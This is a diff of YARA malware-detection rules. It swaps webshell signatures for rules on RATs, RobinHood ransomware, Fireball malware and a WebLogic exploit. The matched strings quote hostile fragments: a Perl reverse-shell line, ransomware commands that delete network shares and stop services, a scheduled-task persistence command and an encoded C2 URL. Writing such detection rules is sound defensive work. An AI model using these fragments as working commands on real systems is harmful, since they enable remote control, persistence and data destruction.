-		author = "Florian Roth (Nextron Systems)"
-		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7905-L7917"
+		description = "Detects unrecom RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "56b11c22-f43c-5192-9a0a-0ac14b0cd041"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/unrecom"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1038-L1058"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
-		logic_hash = "b71cf90900c7eae4caef57564292ca497a2c6c77e3de2994ba9e4cecae7f2697"
+		logic_hash = "15ab9ee2f3fd825e91813a185bc5c7d7e790de39cd3e88c375b801d1412a08f4"
 		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
-		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+		$meta = "META-INF"
+		$conf = "load/ID"
+		$a = "load/JarMain.class"
+		$b = "load/MANIFEST.MF"
+		$c = "plugins/UnrecomServer.class"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_FSO_S_Phvayv_2
+rule SIGNATURE_BASE_MAL_JRAT_Oct18_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file phvayv.php"
+		description = "Detects JRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8bd52f9b-a232-566d-90ab-4085933cdc65"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7918-L7929"
+		id = "f211ef1c-8def-55f0-8817-d01ebd9c2947"
+		date = "2018-10-11"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_rats_malwareconfig.yar#L1060-L1072"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "205ecda66c443083403efb1e5c7f7878"
-		logic_hash = "11418a11692412ccb309983bdadd9bda2b27b692c3282eb0386094e76c7ba1e0"
+		logic_hash = "7c652f3943ae7639633b82663f639adb7dea1bae9e617a14710fb6e448cfdbee"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411"
 
 	strings:
-		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+		$x1 = "/JRat.class" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Elmaliseker
+rule SIGNATURE_BASE_APT_MAL_Fujinama : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file elmaliseker.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7930-L7942"
+		description = "Fujinama RAT used by Leonardo SpA Insider Threat"
+		author = "ReaQta Threat Intelligence Team"
+		id = "b10b1e45-aa6c-53fa-8e02-7a325c3e12fb"
+		date = "2021-01-07"
+		modified = "2023-12-05"
+		reference = "https://reaqta.com/2021/01/fujinama-analysis-leonardo-spa"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fujinama_rat.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ccf48af0c8c09bbd038e610a49c9862e"
-		logic_hash = "54c0b8e74a9b10fe54901c0595600af1dfc54abd3f710fc20ca87ca92236bb49"
+		logic_hash = "9bff8ee5424a939b5278b2d1b349d898d138b9efb3cf783221826abb4d8015ef"
 		score = 75
-		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 51
+		tags = "FILE"
+		version = "1"
 
 	strings:
-		$s0 = "javascript:Command('Download'"
-		$s5 = "zombie_array=array("
+		$kaylog_1 = "SELECT" wide ascii nocase
+		$kaylog_2 = "RIGHT" wide ascii nocase
+		$kaylog_3 = "HELP" wide ascii nocase
+		$kaylog_4 = "WINDOWS" wide ascii nocase
+		$computername = "computername" wide ascii nocase
+		$useragent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" wide ascii nocase
+		$pattern = "'()*+,G-./0123456789:" wide ascii nocase
+		$function_1 = "t_save" wide ascii nocase
+		$cftmon = "cftmon" wide ascii nocase
+		$font = "Tahoma" wide ascii nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Resolve
+rule SIGNATURE_BASE_SUSP_SFX_Runprogram_Wscript : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file resolve.exe"
+		description = "Detects suspicious SFX that runs wscript.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dcdb9952-63fc-57a7-ae17-ffe8ac4271f1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7943-L7960"
+		id = "e12cea50-a939-5f69-963c-d6d1cb133e92"
+		date = "2018-09-27"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_sfx.yar#L2-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "69bf9aa296238610a0e05f99b5540297"
-		logic_hash = "39d8ac274e94f13b5eb197be5827a95ac09df70793bd584c96b81983a565c1ce"
+		logic_hash = "0d00d83d4b25d80d0ca44fe1c3f3cd33ae5539d2d79c84bfdfcc470669d4f78c"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "e3bb02c5985fc64759b9c2d3c5474d46237ce472b4a0101c6313dafa939de5a9"
+		hash2 = "0ecf88d4b32895b4819dec3acb62eaaa7035aa6292499d903f76af60fcec0d6a"
+		hash3 = "a7a48f5220bd1ebe04de258d71fdd001711c165d162bd45e8cfbe8964eddf01c"
+		hash4 = "b6fa4889d8a87d45706d92714d716025bf223c01929755321faac1ab0db94a88"
+		hash5 = "7117b39890659c7dd11e15092c5e5ea9495bec0ff2b6e25254f6e343ed6ca33d"
+		hash6 = "ec2afb63555986fa55b7f98ae57c57e1138acb404a0dd2fe4f3d315730b9898e"
 
 	strings:
-		$s0 = "3^n6B(Ed3"
-		$s1 = "^uldn'Vt(x"
-		$s2 = "\\= uPKfp"
-		$s3 = "'r.axV<ad"
-		$s4 = "p,modoi$=sr("
-		$s5 = "DiamondC8S t"
-		$s6 = "`lQ9fX<ZvJW"
+		$x1 = "RunProgram=\"wscript.exe" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and 1 of them
 }
-rule SIGNATURE_BASE_FSO_S_Remexp
+rule SIGNATURE_BASE_MAL_RANSOM_Robinhood_May19_1 : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file RemExp.asp"
+		description = "Detects RobinHood Ransomware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "48a262bf-7f48-5ed9-b043-80e9d563bf21"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7961-L7974"
+		id = "7199c0de-c925-5399-8fa6-852604190a21"
+		date = "2019-05-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/BThurstonCPTECH/status/1128489465327030277"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_robinhood.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b69670ecdbb40012c73686cd22696eeb"
-		logic_hash = "b9b966a89ab097494d7af90775bf124f1310c77145be67fa57ebdacd0164e3d0"
+		logic_hash = "5eef71b94f2488dceff80ec2daba689c12d13b2742ba9ae5ead58711339d6026"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "21cb84fc7b33e8e31364ff0e58b078db8f47494a239dc3ccbea8017ff60807e3"
 
 	strings:
-		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
-		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
-		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+		$s1 = ".enc_robbinhood" ascii
+		$s2 = "c:\\windows\\temp\\pub.key" ascii fullword
+		$s3 = "cmd.exe /c net use * /DELETE /Y" ascii
+		$s4 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
+		$s5 = "main.EnableShadowFucks" nocase
+		$s6 = "main.EnableRecoveryFCK" nocase
+		$s7 = "main.EnableLogLaunders" nocase
+		$s8 = "main.EnableServiceFuck" nocase
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule SIGNATURE_BASE_FSO_S_Tool
+rule SIGNATURE_BASE_Gen_Exploit_CVE_2017_10271_Weblogic : HIGHVOL CVE_2017_10271 FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file tool.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ed744aa4-7a35-57d6-89bd-3286a21b50a0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7975-L7986"
+		description = "Exploit for CVE-2017-10271 (Oracle WebLogic)"
+		author = "John Lambert @JohnLaTwC"
+		id = "e30e316f-1ebb-5c38-ba25-d2a9d0083a03"
+		date = "2018-03-21"
+		modified = "2023-12-05"
+		reference = "https://github.com/c0mmand3rOpSec/CVE-2017-10271, https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_exploit_cve_2017_10271_weblogic.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3a1e1e889fdd974a130a6a767b42655b"
-		logic_hash = "a3449aca3124aa4d920d78e5e674ddd9d8a181b0ce0143032352a69dfdbcad2d"
+		logic_hash = "01e4f7b1c9c068f3953fa58749a14ea148d2b038c7266da789e0998eae83e1a7"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIGHVOL, CVE-2017-10271, FILE"
+		hash1 = "376c2bc11d4c366ad4f6fecffc0bea8b195e680b4c52a48d85a8d3f9fab01c95"
+		hash2 = "7d5819a2ea62376e24f0dd3cf5466d97bbbf4f5f730eb9302307154b363967ea"
+		hash3 = "864e9d8904941fae90ddd10eb03d998f85707dc2faff80cba2e365a64e830e1d/subfile"
+		hash4 = "2a69e46094d0fef2b3ffcab73086c16a10b517f58e0c1f743ece4f246889962b"
 
 	strings:
-		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
+		$s1 = "<soapenv:Header"
+		$s2 = "java.beans.XMLDecoder"
+		$s3 = "void" fullword
+		$s4 = "index="
+		$s5 = "/array>"
+		$s6 = "\"start\""
+		$s7 = "work:WorkContext" nocase
 
 	condition:
-		all of them
+		filesize < 10KB and ( uint32( 0 ) == 0x616f733c or uint32( 0 ) == 0x54534f50 ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_Felikspack3___PHP_Shells_2005
+rule SIGNATURE_BASE_Fireball_De_Svr : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file 2005.asp"
+		description = "Detects Fireball malware - file de_svr.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "91d278d5-e9ec-5a28-9a54-4549b4f0cd07"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L7987-L7999"
+		id = "29395239-66d8-5340-b884-9b8f036cc27f"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L12-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
-		logic_hash = "4d04174b23c9057acf2618c01cd702eaaec2d3508a8c25dd87fdd320c076a3b1"
+		logic_hash = "9ac858b3ce50daac811ded4664f2a602a32d8811825733d235125fc81a488e58"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f964a4b95d5c518fd56f06044af39a146d84b801d9472e022de4c929a5b8fdcc"
 
 	strings:
-		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
-		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+		$s1 = "cmd.exe /c MD " fullword ascii
+		$s2 = "rundll32.exe \"%s\",%s" fullword wide
+		$s3 = "http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell" fullword wide
+		$s4 = "C:\\v3\\exe\\de_svr_inst.pdb" fullword ascii
+		$s5 = "Internet Connect Failed!" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and 4 of them )
 }
-rule SIGNATURE_BASE_Byloader
+rule SIGNATURE_BASE_Fireball_Lancer : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file byloader.exe"
+		description = "Detects Fireball malware - file lancer.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24940e4b-06eb-548d-9e14-1a8f9c864bd3"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8000-L8015"
+		id = "2209bcb4-74a6-5c39-962c-ccd4ce62619e"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L31-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0f0d6dc26055653f5844ded906ce52df"
-		logic_hash = "66c900e4bc771fb23d7623e57ad51edaa95696c2e31554720582f3e33a1b2e25"
+		logic_hash = "74df144556121609da0820c319a86a9de0f49eeb2d4b1ed59c3a4d0c1d7788cb"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7d68386554e514f38f98f24e8056c11c0a227602ed179d54ed08f2251dc9ea93"
 
 	strings:
-		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
-		$s1 = "Failure ... Access is Denied !"
-		$s2 = "NTFS Disk Driver Checking Service"
-		$s3 = "Dumping Description to Registry..."
-		$s4 = "Opening Service .... Failure !"
+		$x1 = "\\instlsp\\Release\\Lancer.pdb" ascii
+		$x2 = "lanceruse.dat" fullword wide
+		$s1 = "Lancer.dll" fullword ascii
+		$s2 = "RunDll32.exe \"" fullword wide
+		$s3 = "Micr.dll" fullword wide
+		$s4 = "AG64.dll" fullword wide
+		$s5 = "\",Start" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Shelltools_G0T_Root_Fport
+rule SIGNATURE_BASE_Qqbrowser : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file Fport.exe"
+		description = "Not malware but suspicious browser - file QQBrowser.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "664e7b19-4d0b-5062-97d2-0eb34869024d"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8016-L8028"
+		id = "457507c5-0411-5d72-891b-ae3e428ea2d6"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
-		logic_hash = "b9dc66e249c0577839cc3748f129c343d2ccb7327b92a2a67e4467782d10a25e"
-		score = 75
-		quality = 85
-		tags = ""
+		logic_hash = "525d134f57aaa314bcf0676678264e518edb785970478cb31a8fb6f1c8c92263"
+		score = 50
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "adcf6b8aa633286cd3a2ce7c79befab207802dec0e705ed3c74c043dabfc604c"
 
 	strings:
-		$s4 = "Copyright 2000 by Foundstone, Inc."
-		$s5 = "You must have administrator privileges to run fport - exiting..."
+		$s1 = "TerminateProcessWithoutDump" fullword ascii
+		$s2 = ".Downloader.dll" fullword wide
+		$s3 = "Software\\Chromium\\BrowserCrashDumpAttempts" fullword wide
+		$s4 = "QQBrowser_Broker.exe" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Backdoor__Fr_
+rule SIGNATURE_BASE_Chrome_Elf : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file BackDooR (fr).php"
+		description = "Detects Fireball malware - file chrome_elf.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd0c77e8-18b7-5eb4-8ed4-87ee4c864683"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8029-L8040"
+		id = "8680d5b5-e26f-5a3f-aeab-b965afe91027"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a79cac2cf86e073a832aaf29a664f4be"
-		logic_hash = "6c16c200712015eed71aeb119e46bad5f93445a8f719d98ef31f9012cb3551ae"
+		logic_hash = "89f0ab16f164222ecf2a4b14bee02d0c24517d03d1c12b25f5158eebc31b3e3d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e4d4f6fbfbbbf3904ca45d296dc565138a17484c54aebbb00ba9d57f80dfe7e5"
 
 	strings:
-		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+		$x2 = "schtasks /Create /SC HOURLY /MO %d /ST 00:%02d:00 /TN \"%s\" /TR \"%s\" /RU \"SYSTEM\"" fullword wide
+		$s6 = "aHR0cDovL2R2Mm0xdXVtbnNndHUuY2xvdWRmcm9udC5uZXQvdjQvZ3RnLyVzP2FjdGlvbj12aXNpdC5jaGVsZi5pbnN0YWxs" fullword ascii
+		$s7 = "QueryInterface call failed for IExecAction: %x" fullword ascii
+		$s10 = "%s %s,Rundll32_Do %s" fullword wide
+		$s13 = "Failed to create an instance of ITaskService: %x" fullword ascii
+		$s16 = "Rundll32_Do" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
 }
-rule SIGNATURE_BASE_FSO_S_Ntdaddy
+rule SIGNATURE_BASE_Fireball_Regkey : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file ntdaddy.asp"
+		description = "Detects Fireball malware - file regkey.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b6b655b8-7bce-5fa5-97b7-a020a7e53f4f"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8041-L8052"
+		id = "6e22bb93-8c8b-510f-a9e4-6e57c392c2ae"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L92-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
-		logic_hash = "4df6f53ee9bfc0214e69dd858878026e962b90573ed48a5ffdd5523538e8f3bf"
+		logic_hash = "f8fe8b1edb009ac84acf6159feada91d364507c53a9f92abd6b245b38fa058f5"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fff2818caa9040486a634896f329b8aebaec9121bdf9982841f0646763a1686b"
 
 	strings:
-		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+		$s1 = "\\WinMain\\Release\\WinMain.pdb" ascii
+		$s2 = "ScreenShot" fullword wide
+		$s3 = "WINMAIN" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Nstview_Nstview
+rule SIGNATURE_BASE_Fireball_Winsap : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file nstview.php"
+		description = "Detects Fireball malware - file winsap.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00df601c-bddb-5da8-bef4-d2122419b5d0"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8053-L8064"
+		id = "e68e7738-f325-5b73-9e61-4e2413b7b7be"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L110-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3871888a0c1ac4270104918231029a56"
-		logic_hash = "2b25e22d86a672af0b8957f1b0336ed80e09f3389f5045c230af2372db0e3415"
+		logic_hash = "de722d90d82f82faa5dfe5991c846e5c16deb919ae653b8f9fe4d1ad0384c41d"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c7244d139ef9ea431a5b9cc6a2176a6a9908710892c74e215431b99cd5228359"
 
 	strings:
-		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+		$s1 = "aHR0cDovL2" ascii
+		$s2 = "%s\\svchost.exe -k %s" fullword wide
+		$s3 = "\\SETUP.dll" wide
+		$s4 = "WinSAP.dll" fullword ascii
+		$s5 = "Error %u in WinHttpQueryDataAvailable." fullword ascii
+		$s6 = "UPDATE OVERWRITE" fullword wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 4 of them )
 }
-rule SIGNATURE_BASE_Hytop_Devpack_Upload
+rule SIGNATURE_BASE_Fireball_Archer : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file upload.asp"
+		description = "Detects Fireball malware - file archer.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43054993-b0dd-5d2e-9890-db1f47759be5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8065-L8076"
+		id = "16bb95c1-af69-5688-8999-f097d02d2ffc"
+		date = "2017-06-02"
+		modified = "2022-12-21"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L130-L149"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b09852bda534627949f0259828c967de"
-		logic_hash = "312020a72a37adb0111ac6d61810c8e476be39dc6456e80e83cd6a680e8ea051"
+		logic_hash = "f566ba477ccf1325914b6c9785e2b85f732b211e9321eea24d6c5a0339ccc4d1"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022"
 
 	strings:
-		$s0 = "<!-- PageUpload Below -->"
+		$x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" ascii
+		$s1 = "Archer_Input.dll" fullword ascii
+		$s2 = "InstallArcherSvc" fullword ascii
+		$s3 = "%s_%08X" fullword wide
+		$s4 = "d\\\\.\\PhysicalDrive%d" fullword wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_Passwordreminder
+rule SIGNATURE_BASE_Clearlog : FILE
 {
 	meta:
-		description = "Webshells Auto-generated - file PasswordReminder.exe"
+		description = "Detects Fireball malware - file clearlog.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "642033ee-4454-5913-8348-4d1579fc0bd8"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8077-L8088"
+		id = "3eb58a7a-b04d-52c2-8c3c-c149da8d4aa8"
+		date = "2017-06-02"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/4pTkGQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_fireball.yar#L151-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
-		logic_hash = "f3da5381f5e352c541654d2af918ca8cea8049d137078670dd0538a4d13f676e"
+		logic_hash = "6b6fd74ad184cafa7885385f808034e9211ff37e04ed5e8ea4af2c7fb7d697bd"
 		score = 75
